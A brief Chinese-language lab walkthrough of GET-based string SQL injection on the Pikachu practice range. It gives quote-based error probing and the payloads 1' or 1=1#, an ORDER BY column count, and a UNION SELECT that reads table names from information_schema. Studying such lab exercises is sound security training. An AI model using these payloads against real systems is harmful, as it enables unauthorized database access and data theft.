Pikachu靶场之SQL注入-GET方式
打开字符型(GET)注入,在输入框中输入1,返回结果是:您输入的username不存在,请重新输入!
加个单引号,返回结果报错:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1大概意思是语法错误,说明我们输入的单引号被带入服务器后端。输入:
1' or 1=1#
输入
1' order by 2#猜字段
输入
1'+union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
可以看到表都显示在浏览器界面